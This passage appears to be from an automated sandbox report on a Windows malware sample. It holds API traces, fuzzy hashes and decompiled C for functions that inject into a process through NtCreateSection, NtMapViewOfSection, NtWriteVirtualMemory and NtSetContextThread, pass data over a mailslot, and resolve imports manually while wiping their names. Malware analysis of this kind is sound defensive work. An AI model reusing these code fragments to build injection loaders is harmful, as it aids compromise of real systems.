  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
